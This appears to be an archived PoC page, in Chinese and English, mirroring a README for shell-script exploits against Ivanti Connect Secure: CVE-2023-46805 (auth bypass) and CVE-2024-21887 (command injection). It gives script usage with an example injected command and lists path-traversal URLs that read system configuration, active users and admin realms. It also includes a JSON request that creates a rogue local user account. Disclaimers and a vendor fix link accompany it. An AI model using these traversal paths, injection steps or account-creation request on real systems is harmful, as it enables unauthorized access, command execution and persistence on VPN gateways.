关联漏洞
标题:
Ivanti ICS 授权问题漏洞
(CVE-2023-46805)
描述:Ivanti ICS是美国Ivanti公司的一代远程安全访问产品。 Ivanti ICS 9.x版本、22.x版本、Ivanti Policy Secure存在授权问题漏洞,该漏洞源于 Web 组件中存在身份验证绕过漏洞。攻击者利用该漏洞可以绕过控制检查来访问受限资源。
介绍
# CVE-2023-46805
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
usage: ./CVE-2023-46805.sh http(s)://fqdn:port
<br>./CVE-2023-46805.sh https://my.vpn.ip:443

notes:
chmod +x CVE-2023-46805.sh
<br> require app curl + json_pp
result if vulnerable, you should see somes stuffs:

# CVE-2024-21887
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
- run the poc (it will try the 2 entries points)
usage: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
<br>./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"
result if vulnerable, you should see somes stuffs and your payload should be working:

notes:
chmod +x CVE-2024-21887.sh
<br> require apps curl, xxd, tr & sed
# Juicy information
/api/v1/totp/user-backup-code/../../configuration/system/configuration
/api/v1/totp/user-backup-code/../../system/active-users
/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users
-create an account
/authentication/auth-servers/authserver/System%20Local/local/users/user
-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'
------
<br>Workaround/Fix: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
Kudos: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
------
more about me ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Disclaimer:
IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal actions. The author is NOT responsible for any damage caused by the misuse of this script.
文件快照
[4.0K] /data/pocs/0d0577c621325ed03862685eb4c2d38767b46857
├── [ 244] CVE-2023-46805.sh
├── [ 307] CVE-2024-21887.sh
└── [2.7K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。